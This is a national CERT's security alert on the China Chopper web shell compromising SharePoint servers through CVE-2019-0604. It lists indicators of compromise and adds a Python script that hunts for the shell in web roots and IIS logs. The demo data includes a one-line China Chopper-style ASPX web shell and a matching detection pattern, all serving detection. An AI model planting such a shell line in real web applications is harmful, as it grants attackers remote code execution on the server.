Alert - China Chopper Malware affecting SharePoint Servers

Number: AL19-006
Date: 23 April 2019

Audience

This Alert is intended for IT professionals and managers of notified organizations. Recipients of this information may only redistribute it within their respective organizations.

Purpose

An Alert is used to raise awareness of a recently identified cyber threat that may impact cyber information assets, and to provide additional detection and mitigation advice to recipients. The Canadian Centre for Cyber Security ("Cyber Centre") is also available to provide additional assistance regarding the content of this Alert to recipients as requested.

Assessment

The Cyber Centre is aware of a campaign that is currently compromising several versions of Microsoft SharePoint Server in order to deploy the China Chopper web shell. Trusted researchers have identified compromised systems belonging to the academic, utility, heavy industry, manufacturing and technology sectors. The following versions of Microsoft SharePoint are known to be affected:

  • Microsoft SharePoint Enterprise Server 2016
  • Microsoft SharePoint Foundation 2013 SP1
  • Microsoft SharePoint Server 2010 SP2
  • Microsoft SharePoint Server 2019

It is likely that the current campaign is leveraging CVE-2019-0604, a remote code execution vulnerability in SharePoint, in order to deploy the web shell. Microsoft released security updates addressing this vulnerability in February and March 2019; however, many systems remain unpatched.

Suggested action

  • All Microsoft SharePoint Server installations should be patched with the latest security update, dated 12 March 2019, using Microsoft Update, the Microsoft Update Catalog or the Microsoft Download Center.
  • If a SharePoint instance serves strictly as an on-premises solution, ensure that the server is not reachable from the Internet.

Indicators of compromise

HASH Values

MD5 Hash: b814532d73c7e5ffd1a2533adc6cfcf8
SHA1 Hash: dc8e7b7de41cac9ded920c41b272c885e1aec279
SHA256 Hash: 05108ac3c3d708977f2d679bfa6d2eaf63b371e66428018a68efce4b6a45b4b4
Filename: pay.aspx

MD5 Hash: 708544104809ef2776ddc56e04d27ab1
SHA1 Hash: f0fb0f7553390f203669e53abc16b15e729e5c6f
SHA256 Hash: b560c3b9b672f42a005bdeae79eb91dfb0dec8dc04bea51f38731692bc995688

MD5 Hash: 0eebeef32a8f676a1717f134f114c8bd
SHA1 Hash: 4c3b262b4134366ad0a67b1a2d6378da428d712b
SHA256 Hash: 7d6812947e7eafa8a4cce84b531f8077f7434dbed4ccdaca64225d1b6a0e8604
Filename: stylecss.aspx

IP Address

114.25.219.100
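The following Python script is an added example and is not part of the Cyber Centre alert; it shows one way to hunt for the indicators above on a SharePoint host. It walks a web root (typically the LAYOUTS folder under "Web Server Extensions" and the IIS virtual directories under inetpub\wwwroot\wss; these locations are an assumption, adjust them to the installation) and flags .aspx/.ashx/.asmx files whose name or hash matches the published indicators. Because the published hashes only match byte-identical files, it also looks for the China Chopper ASPX pattern, a one-line eval of a request parameter, which catches variants that use a different parameter name. The IIS log scanner parses the W3C #Fields header and reports requests from the listed IP address or POSTs to the listed filenames. The sample web files and log lines in demo() are constructed for illustration and are not real samples.

```python
import hashlib
import os
import re
import tempfile

# Hashes published in the alert (AL19-006), all lower-case hex.
IOC_HASHES = {
    "b814532d73c7e5ffd1a2533adc6cfcf8",
    "dc8e7b7de41cac9ded920c41b272c885e1aec279",
    "05108ac3c3d708977f2d679bfa6d2eaf63b371e66428018a68efce4b6a45b4b4",
    "708544104809ef2776ddc56e04d27ab1",
    "f0fb0f7553390f203669e53abc16b15e729e5c6f",
    "b560c3b9b672f42a005bdeae79eb91dfb0dec8dc04bea51f38731692bc995688",
    "0eebeef32a8f676a1717f134f114c8bd",
    "4c3b262b4134366ad0a67b1a2d6378da428d712b",
    "7d6812947e7eafa8a4cce84b531f8077f7434dbed4ccdaca64225d1b6a0e8604",
}
IOC_FILENAMES = {"pay.aspx", "stylecss.aspx"}
IOC_IP = "114.25.219.100"

# The China Chopper ASPX server side is a one-line eval of a request parameter.
# The parameter name (the operator's "password") varies between samples, so a
# pattern catches variants whose hashes differ from the published ones.
CHOPPER_RE = re.compile(rb'eval\s*\(\s*Request\.Item\s*\[', re.IGNORECASE)


def file_digests(path):
    """Return the set {md5, sha1, sha256} of a file, computed in one pass."""
    md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            for h in (md5, sha1, sha256):
                h.update(chunk)
    return {md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()}


def scan_webroot(root):
    """Return (path, reasons) for every server-side script under root matching an IOC."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".aspx", ".ashx", ".asmx")):
                continue
            path = os.path.join(dirpath, name)
            reasons = []
            if name.lower() in IOC_FILENAMES:
                reasons.append("ioc-filename")
            if file_digests(path) & IOC_HASHES:
                reasons.append("ioc-hash")
            with open(path, "rb") as fh:
                if CHOPPER_RE.search(fh.read()):
                    reasons.append("chopper-eval-pattern")
            if reasons:
                findings.append((path, reasons))
    return findings


def scan_iis_log(lines):
    """Return (c-ip, method, uri) for requests from the IOC IP or POSTs to an IOC filename.

    Field positions are taken from the W3C '#Fields:' header so the parser does
    not depend on a particular IIS logging configuration. IIS replaces spaces in
    logged values with '+', so splitting on single spaces is safe.
    """
    fields, hits = [], []
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        cip = row.get("c-ip", "")
        method = row.get("cs-method", "")
        uri = row.get("cs-uri-stem", "")
        if cip == IOC_IP or (method == "POST" and os.path.basename(uri).lower() in IOC_FILENAMES):
            hits.append((cip, method, uri))
    return hits


def demo():
    """Run both scanners over constructed sample data (not real compromise data)."""
    root = tempfile.mkdtemp()
    layouts = os.path.join(root, "TEMPLATE", "LAYOUTS")
    os.makedirs(layouts)
    # Constructed China Chopper-style shell with a non-published parameter name.
    with open(os.path.join(layouts, "shell.aspx"), "wb") as fh:
        fh.write(b'<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>')
    # Constructed benign page that must not be flagged.
    with open(os.path.join(layouts, "error.aspx"), "wb") as fh:
        fh.write(b'<%@ Page Language="C#" %><html><body>Error</body></html>')
    # Constructed IIS W3C log excerpt.
    log = [
        "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
        "2019-04-20 10:01:02 10.0.0.5 GET /_layouts/15/start.aspx - 443 - 10.0.0.9 Mozilla/5.0 200",
        "2019-04-20 10:01:07 10.0.0.5 POST /_layouts/15/stylecss.aspx - 443 - 203.0.113.7 Mozilla/5.0 200",
        "2019-04-20 10:01:09 10.0.0.5 POST /_layouts/15/shell.aspx - 443 - 114.25.219.100 Mozilla/5.0 200",
    ]
    return scan_webroot(root), scan_iis_log(log)


if __name__ == "__main__":
    files, hits = demo()
    for path, reasons in files:
        print("FILE", path, ",".join(reasons))
    for cip, method, uri in hits:
        print("LOG ", cip, method, uri)
```

A hash or filename match is a strong indicator; a pattern match on its own still warrants a manual look at the file, since the eval-of-request-parameter construct has no legitimate use in a SharePoint layout page. Any hit should be treated as a confirmed web shell and followed by the usual incident response steps rather than by simply deleting the file, because the shell is the persistence mechanism, not the initial entry.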

References

Microsoft advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604

ZDI article: https://www.zerodayinitiative.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability

China Chopper information: https://cyber.gc.ca/en/guidance/web-shells-china-chopper

Note to readers

The Canadian Centre for Cyber Security (Cyber Centre) operates as part of the Communications Security Establishment. We are Canada's national authority on cyber security and we lead the government's response to cyber security events. As Canada's national computer security incident response team, the Cyber Centre works in close collaboration with government departments, critical infrastructure, Canadian businesses and international partners to prepare for, respond to, mitigate, and recover from cyber events. We do this by providing authoritative advice and support, and coordinating information sharing and incident response. The Cyber Centre is outward-facing, welcoming partnerships that help build a stronger, more resilient cyber space in Canada.
